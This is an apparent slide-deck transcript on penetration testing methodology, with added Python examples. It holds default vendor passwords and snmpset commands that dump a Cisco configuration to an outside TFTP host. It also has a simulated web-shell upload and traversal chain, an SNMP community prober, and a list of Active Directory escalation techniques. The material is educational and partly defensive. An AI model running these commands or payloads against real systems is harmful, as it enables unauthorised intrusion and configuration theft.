Penetration testing: What's this?


Published in: Technology


1. Penetration testing: What's this?
   Dmitry Evteev (Positive Technologies)
2. Penetration testing internals
   • Penetration testing != a simulation of the activities of a (real or hypothetical) attacker
   • Penetration testing != automated scanning plus manual verification of the findings
   • Penetration testing is:
     - a set of activities aimed at assessing the current state of the security processes;
     - a test of whether the protection mechanisms can be bypassed;
     - one of the methods of security audit.
3. Methodology
   • On the one hand, the following best practices are used:
     - Open Source Security Testing Methodology Manual (OSSTMM)
     - Web Application Security Consortium (WASC)
     - Open Web Application Security Project (OWASP)
     - …
   • On the other hand, the following standards are used:
     - Center for Internet Security (CIS) guides
     - ISO/IEC 2700x series standards
     - …
4. Abilities
   [Table: protection mechanisms 1 … N versus how each reacted during the test; recovered rows:]
   Protection mechanism N … X
   Incident management: some activities were detected but not identified as an attack.
5. Aims
   • High-level
     - Internal politics (the pentest as an instrument of pressure)
     - Assessment of the current security processes
     - It has to be done (compliance)
   • Technological
     - Gain unauthorized access to the internal network from the Internet
     - Gain maximum privileges in the main infrastructure systems (Active Directory, network hardware, DBMS, ERP, etc.)
     - Gain access to specific information resources
     - Gain access to specific data (information)
6. Approaches
   • Perimeter pentest (with further attacks on the internal network)
     - With or without the administrators' awareness
     - Wireless network security analysis
   • Internal pentest
     - From an ordinary user's workstation
     - From a chosen network segment
   • Testing (security analysis) of a particular information system component
     - Black, Grey and White Box
   • Assessment of employee information security awareness
7. Real attack vs. penetration testing
   • For the person who actually performs it, a pentest IS hacking!
   • Limitations
     - Compliance with the legislation of the Russian Federation
     - Limited time
     - Minimum impact
     - No tests such as DDoS
   • Inconveniences
     - Coordination of actions (this can be taken to a very absurd extreme!)
     - Responsibility/punctuality
   • Advantages
     - No need to hide the activity
     - Simplified identification of the network perimeter
     - Possibility to use Grey and White Box methods
8. Instruments
   • Positive Technologies MaxPatrol
   • Nmap/dnsenum/dig…
   • …
   • Immunity CANVAS (VulnDisco, Agora Pack, VoIP Pack)
   • Metasploit
   • …
   • THC Hydra/THC PPTP bruter/Ncrack…
   • Cain & Abel/Wireshark
   • Aircrack
   • …
   • Yersinia
   • …
   • Browser, notepad…
9. The web application security problem
   • The most frequent web application vulnerabilities detected by the Black Box method (2009 statistics)
   [Chart: frequency of vulnerability classes]
10. Pentest example: web applications
   • What does a Black Box web application pentest look like? (real world)
   [Diagram: auditor workstation → web server; Check 1 … Check N; "Vulnerability is detected"]
   • Vulnerability 1: password bruteforce. Impact: access to the application (with limited privileges).
   • Vulnerability 2: SQL injection. Impact: file reading only (the magic_quotes option is enabled).
   • Vulnerability 3: path traversal. Impact: file reading only (potentially LFI).
   • Vulnerability 4: predictable identifier of an uploaded file. Vulnerability 3 + Vulnerability 4 = Impact: command execution on the server.
   • Next step: FURTHER ATTACK
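The chain on this slide is worth seeing in code: on its own, a path traversal only reads files, but once the attacker can guess where their own upload landed, the same traversal "includes" attacker-controlled content. The following is an added example, not code from the presentation; the upload-name scheme, the download handler and the PHP payload string are hypothetical, and the whole chain is simulated inside a temporary directory. The hardened resolver shows the check a practitioner wants next to the vulnerable one.

```python
"""Vulnerability 3 + Vulnerability 4: read-only traversal + predictable upload name."""
import os
import secrets
import tempfile
import time


def predictable_upload_name(upload_time: float, seq: int) -> str:
    """Vulnerability 4 (hypothetical scheme): name built from the upload timestamp and a
    counter, so whoever knows roughly when they uploaded can enumerate a few candidates."""
    return f"upload_{int(upload_time)}_{seq}.dat"


def unpredictable_upload_name() -> str:
    """Hardened variant: 128 random bits, unrelated to time or upload order."""
    return f"upload_{secrets.token_hex(16)}.dat"


def resolve_vulnerable(base: str, requested: str) -> str:
    """Vulnerability 3: user input is joined to the base directory unchecked,
    so '../' sequences walk out of it (path traversal / LFI)."""
    return os.path.join(base, requested)


def resolve_hardened(base: str, requested: str) -> str:
    """Canonicalise, then require the result to stay inside base; raise on escape."""
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, requested))
    if os.path.commonpath([base_real, target]) != base_real:
        raise PermissionError(f"path traversal rejected: {requested!r}")
    return target


def candidate_names(upload_time: float, window: int = 5, max_seq: int = 3) -> list:
    """Attacker's view of Vulnerability 4: every name an upload made around
    upload_time could have received (+/- window seconds, first max_seq counters)."""
    return [predictable_upload_name(upload_time + dt, s)
            for dt in range(-window, window + 1) for s in range(max_seq)]


def chain_demo() -> dict:
    """Simulate the chain: upload a payload under a predictable name outside the
    document root, guess the name, then reach it through the traversal."""
    with tempfile.TemporaryDirectory() as root:
        docroot = os.path.join(root, "www")
        uploads = os.path.join(root, "uploads")      # deliberately outside docroot
        os.makedirs(docroot)
        os.makedirs(uploads)
        now = time.time()
        with open(os.path.join(uploads, predictable_upload_name(now, 1)), "w") as f:
            f.write("<?php system($_GET['c']); ?>")   # constructed attacker payload
        guessed = [n for n in candidate_names(now)
                   if os.path.exists(os.path.join(uploads, n))]
        traversal = os.path.join("..", "uploads", guessed[0])
        with open(resolve_vulnerable(docroot, traversal)) as f:
            included = f.read()                       # what the vulnerable app would include
        try:
            resolve_hardened(docroot, traversal)
            hardened_blocked = False
        except PermissionError:
            hardened_blocked = True
        return {"guessed": len(guessed),
                "vulnerable_reads_payload": "system(" in included,
                "hardened_blocked": hardened_blocked}
```

The point of `candidate_names` is that the attacker never needs the exact name: a few dozen requests cover the whole window. `resolve_hardened` relies on `realpath` so symlinks and `..` are resolved before the containment check, which is the order that matters.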
11. The weak password problem
   • The recommended password policy is in place
   • What is the domain administrator's password?
     (it is the same as the login)
12. Pentest example: password bruteforce (defaults)
   • Well known
     - admin:123456
     - Administrator:P@ssw0rd
     - …
   • SAP
     - (DIAG) SAP*: 06071992, PASS
       clients (mandants): 000, 001, 066, and every newly created one
     - (RFC) SAPCPIC: ADMIN
       clients (mandants): 000, 001, 066, and every newly created one
     - …
   • Oracle
     - system:manager
     - sys:change_on_install
     - …
   • Cisco
     - Cisco:Cisco
     - …
   • …
13. Pentest example: Hello, Pavlik :)
   • Dumping the running configuration of a Cisco device to a TFTP server over SNMP, using the default write community "private" and the CISCO-CONFIG-COPY-MIB objects (net-snmp type letters: i = INTEGER, a = IpAddress, s = OCTET STRING):
     snmpset -v 1 -c private <cisco> . i 1               # ccCopyProtocol: 1 = tftp
     snmpset -v 1 -c private <cisco> . i 4               # ccCopySourceFileType: 4 = runningConfig
     snmpset -v 1 -c private <cisco> . i 1               # ccCopyDestFileType: 1 = networkFile
     snmpset -v 1 -c private <cisco> . a <tftp_host>     # ccCopyServerAddress: the TFTP server
     snmpset -v 1 -c private <cisco> . s running-config  # ccCopyFileName: file name on the TFTP server
     snmpset -v 1 -c private <cisco> . i 1               # ccCopyEntryRowStatus: 1 = active, starts the copy
     snmpset -v 1 -c private <cisco> . i 6               # ccCopyEntryRowStatus: 6 = destroy, clears the row
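Everything on this slide depends on one precondition: the device answers to a guessable community string. The check a practitioner wants is a probe for default communities that does not need a full SNMP stack. The following is an added example, not code from the presentation: it hand-encodes SNMPv1 GetRequest and SetRequest messages with BER (standard library only) and probes a host. The host, the community list and the use of MIB-II sysDescr.0 as the probe object are choices made here, not the slide's.

```python
"""SNMPv1 community probe: hand-encoded BER, no third-party SNMP library."""
import socket

SYS_DESCR_0 = "1.3.6.1.2.1.1.1.0"          # MIB-II sysDescr.0, present on every agent
DEFAULT_COMMUNITIES = ["public", "private", "cisco", "secret"]   # constructed list


def _ber_len(n: int) -> bytes:
    """BER length: short form below 0x80, otherwise long form."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, payload: bytes) -> bytes:
    return bytes([tag]) + _ber_len(len(payload)) + payload


def ber_int(value: int) -> bytes:
    """INTEGER (tag 0x02), minimal two's-complement encoding; non-negative values only."""
    body = value.to_bytes(value.bit_length() // 8 + 1, "big", signed=True)
    return _tlv(0x02, body)


def ber_oid(oid: str) -> bytes:
    """OBJECT IDENTIFIER (tag 0x06): first two arcs packed as 40*a+b, rest base-128."""
    arcs = [int(a) for a in oid.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return _tlv(0x06, bytes(out))


def _message(community: str, pdu_tag: int, request_id: int, varbinds: bytes) -> bytes:
    """Message ::= SEQUENCE { version INTEGER (0 = SNMPv1), community OCTET STRING, PDU }"""
    pdu = _tlv(pdu_tag, ber_int(request_id) + ber_int(0) + ber_int(0) + _tlv(0x30, varbinds))
    return _tlv(0x30, ber_int(0) + _tlv(0x04, community.encode()) + pdu)


def build_get_request(community: str, oid: str, request_id: int = 1) -> bytes:
    """GetRequest-PDU (tag 0xA0) for one OID with a NULL placeholder value."""
    return _message(community, 0xA0, request_id, _tlv(0x30, ber_oid(oid) + _tlv(0x05, b"")))


def build_set_request(community: str, oid: str, value: bytes, request_id: int = 1) -> bytes:
    """SetRequest-PDU (tag 0xA3) writing an OCTET STRING: the message snmpset ... s sends.
    A read-only community gets an error-status (or no reply) instead of a success."""
    return _message(community, 0xA3, request_id, _tlv(0x30, ber_oid(oid) + _tlv(0x04, value)))


def probe_communities(host: str, communities=DEFAULT_COMMUNITIES, timeout: float = 1.0) -> list:
    """Return the communities for which the agent answers a GetRequest. An SNMPv1 agent
    silently drops requests carrying a wrong community, so any reply means 'accepted'."""
    accepted = []
    for request_id, community in enumerate(communities, start=1):
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
            sock.settimeout(timeout)
            sock.sendto(build_get_request(community, SYS_DESCR_0, request_id), (host, 161))
            try:
                data, _ = sock.recvfrom(4096)
            except socket.timeout:
                continue
            if data[:1] == b"\x30":          # outer SEQUENCE: an SNMP message came back
                accepted.append(community)
    return accepted
```

A GET probe is non-destructive and tells you which strings are accepted at all; to tell a read-only community from a write community you would send `build_set_request` against an object you are entitled to modify and inspect the error-status in the reply. On the defensive side the same fact cuts the other way: SNMPv1/v2c communities are plaintext, so the fix is not a stronger string but an ACL on who may talk SNMP to the device, read-only communities where writes are not needed, and SNMPv3 where they are.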
14. The problem of access control
   • Network access
     - Network architecture (DMZ, technological network, user segment, test environment)
     - Remote network access
   • Data access
     - Shared resources (passwords in clear text, backup copies, other sensitive data)
     - Web applications, DBMS, ERP
15. The problem of access control
   • Separation of privileges among administrators
   • Users with excessive privileges
   • Services (!) with a higher access level than they require
   • The general problem of account (identity) management
16. Pentest example: exploitation of vulnerabilities
   • CANVAS && Metasploit
17. Pentest example: privilege escalation in Active Directory
   • Option 1: password bruteforce
   • Option 2: vulnerabilities in domain controller services
   • Option 3: pass-the-hash attack
   • Option 4: create a new user from a domain computer
   • Option 5: ARP cache poisoning (e.g. hijack an RDP session, downgrade the authentication level to LM)
   • Option 6: NTLM relay attack
   • Option 7: find and restore a domain System State backup (e.g. after a successful attack on the backup server)
   • Option 8: gain extended privileges through other systems (e.g. control over records in the company's root DNS)
   • Option 9: gain extended privileges via vulnerabilities in other systems (passwords stored with reversible encryption, insecure protocols in use, etc.)
   • Option N…
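Several of the options above rest on account settings that a defender can enumerate before the pentester does: reversible password storage (Option 9), accounts with no password required or with Kerberos pre-authentication disabled (which feed Option 1), and unconstrained delegation. The following is an added example, not code from the presentation: it decodes the `userAccountControl` bitmask of constructed user records in the shape an LDAP export (ldapsearch, Get-ADUser) produces and flags the risky settings. The flag values are the documented ADS_USER_FLAG bits; the sample accounts are invented.

```python
"""Audit of userAccountControl flags that ease privilege escalation in AD."""

# ADS_USER_FLAG bit values
ACCOUNTDISABLE = 0x0002
PASSWD_NOTREQD = 0x0020
ENCRYPTED_TEXT_PWD_ALLOWED = 0x0080
NORMAL_ACCOUNT = 0x0200
DONT_EXPIRE_PASSWORD = 0x10000
TRUSTED_FOR_DELEGATION = 0x80000
DONT_REQ_PREAUTH = 0x400000

FINDINGS = {
    ENCRYPTED_TEXT_PWD_ALLOWED: "password stored with reversible encryption",
    PASSWD_NOTREQD: "password not required (may be empty)",
    DONT_REQ_PREAUTH: "Kerberos pre-authentication not required (AS-REP roastable)",
    TRUSTED_FOR_DELEGATION: "unconstrained delegation",
    DONT_EXPIRE_PASSWORD: "password never expires",
}

# Constructed sample; userAccountControl is decimal, as ldapsearch prints it.
SAMPLE_USERS = [
    {"sAMAccountName": "svc_backup", "userAccountControl": "66176", "adminCount": "1"},  # 0x10280
    {"sAMAccountName": "jdoe", "userAccountControl": "512"},                             # 0x200
    {"sAMAccountName": "old_admin", "userAccountControl": "514"},                        # 0x202 disabled
    {"sAMAccountName": "svc_sql", "userAccountControl": "4260384"},                      # 0x410220
    {"sAMAccountName": "appsrv$", "userAccountControl": "528384"},                       # 0x81000
]


def audit_user(record: dict) -> list:
    """Return the findings for one account; disabled accounts yield nothing because
    they cannot be logged on with directly."""
    uac = int(record["userAccountControl"])
    if uac & ACCOUNTDISABLE:
        return []
    hits = [text for flag, text in FINDINGS.items() if uac & flag]
    # adminCount=1 is set by SDProp on members of protected groups; a weak setting
    # on such an account is a direct path to domain-level privileges.
    if hits and record.get("adminCount") == "1":
        hits.append("account is (or was) a member of a protected admin group")
    return hits


def audit(records) -> dict:
    """Map sAMAccountName -> findings for every account that has at least one."""
    result = {}
    for record in records:
        hits = audit_user(record)
        if hits:
            result[record["sAMAccountName"]] = hits
    return result


if __name__ == "__main__":
    for name, hits in audit(SAMPLE_USERS).items():
        print(name)
        for hit in hits:
            print("   -", hit)
```

Run against a real export, the same function tells you which of the slide's options are already "pre-authorised" by configuration: an account with `ENCRYPTED_TEXT_PWD_ALLOWED` hands its cleartext password to anyone who can read the directory database, and `DONT_REQ_PREAUTH` turns Option 1 into an offline attack.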
18. Pentest example: security analysis
   • Network scanning
   • A password is bruteforced!
     - Exploitation of SQL injection
     - Command execution on the server
     - Gaining privileges
     - Attack on internal resources
     - Internal pentest
     - Installation of the MaxPatrol scanner
     - Finding vulnerabilities
     - Exploiting vulnerabilities
     - Moving into the head office network
     - Attacks on head office resources
     - Maximum privileges in the whole network!
19. Pentest example: security analysis
20. Pentest example: wireless networks
21. Pentest example: assessment of awareness program efficiency
   • Send provocative messages by e-mail
   • Send provocative messages via ICQ (and other IM)
   • Distribute storage media with provocative content
   • Question employees
   • Conversations (by telephone, Skype)
22. Pentest example: example of a set of checks

   Message description                                                                        | Attack                                                                                                                      | Monitored events
   A message from management with an attached executable file.                                | Spread of network worms. System infection with a Trojan horse.                                                              | Open the mailbox. Execute the attached file.
   A message from an insider with a link to a web site; the link points to an executable file. | Phishing attacks. Spread of network worms. System infection with a Trojan horse. Attacks through software vulnerabilities. | Open the mailbox. Download the file from the web server. Execute the file.
   A message from management with a link to a web site.                                       | Phishing attacks. Spread of network worms. System infection with a Trojan horse. Attacks through software vulnerabilities. | Open the mailbox. Follow the link.
23. Pentest example: assessment of awareness program efficiency
   [Chart: share of users that follow the link, one-off pentest vs. regular pentests]
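The metric on slides 21 to 23, "users that follow the link", needs each click attributed to a recipient without putting user names into the URL and without letting forwarded or forged links distort the count. The following is an added example, not the presentation's own tooling: it issues a per-campaign HMAC token per recipient, parses constructed web server log lines in the common combined format, and computes the click rate. The token scheme, host name and log lines are choices made here.

```python
"""Per-recipient tracking tokens and click-rate computation for an awareness test."""
import hashlib
import hmac
import re
from urllib.parse import parse_qs, urlparse

CAMPAIGN_KEY = b"constructed-campaign-secret"   # use a fresh random key per campaign


def make_token(user: str, key: bytes = CAMPAIGN_KEY) -> str:
    """Opaque token: without the key it can neither be forged nor mapped back to a user."""
    return hmac.new(key, user.encode(), hashlib.sha256).hexdigest()[:16]


def tracking_link(user: str, base: str = "http://training.example.test/info") -> str:
    """The URL placed in the provocative message (host name is a placeholder)."""
    return f"{base}?t={make_token(user)}"


# Combined log format: host ident authuser [time] "method path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def clicks_from_log(lines, recipients, key: bytes = CAMPAIGN_KEY) -> dict:
    """Map tokens in GET requests back to recipients. Repeat clicks count once; unknown
    tokens are tallied separately, since they point at forwarding, tampering or a mail
    gateway that pre-fetches links, none of which is a user following the link."""
    by_token = {make_token(u, key): u for u in recipients}
    clicked, unknown = set(), 0
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "GET":
            continue
        for tok in parse_qs(urlparse(m["path"]).query).get("t", []):
            if tok in by_token:
                clicked.add(by_token[tok])
            else:
                unknown += 1
    return {"clicked": sorted(clicked), "unknown_tokens": unknown,
            "rate": len(clicked) / len(recipients) if recipients else 0.0}


# Constructed sample data.
RECIPIENTS = ["ivanov", "petrov", "sidorov", "smirnova"]
SAMPLE_LOG = [
    f'10.0.5.17 - - [12/May/2010:09:14:03 +0400] "GET /info?t={make_token("ivanov")} HTTP/1.1" 200 512',
    f'10.0.5.17 - - [12/May/2010:09:14:09 +0400] "GET /info?t={make_token("ivanov")} HTTP/1.1" 200 512',
    f'10.0.5.44 - - [12/May/2010:09:20:41 +0400] "GET /info?t={make_token("petrov")} HTTP/1.1" 200 512',
    '10.0.9.2 - - [12/May/2010:09:21:00 +0400] "GET /info?t=deadbeefdeadbeef HTTP/1.1" 200 512',
    '10.0.5.44 - - [12/May/2010:09:22:13 +0400] "GET /favicon.ico HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    print(clicks_from_log(SAMPLE_LOG, RECIPIENTS))
```

Keeping the key per campaign matters for the comparison the chart on this slide draws between a one-off test and regular tests: tokens from an earlier round cannot be replayed into a later one, so each round's rate reflects only that round's behaviour.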
24. Conclusions
   • Penetration testing is a set of activities that allows an efficient assessment of the current security processes
   • Penetration testing is the search for, and exploitation of, flaws in security processes:
     - vulnerability management
     - configuration management
     - incident management
     - security management of web applications, DBMS, ERP, wired and wireless networks, etc.
     - etc.
25. Thank you for your attention! Any questions? [email_address]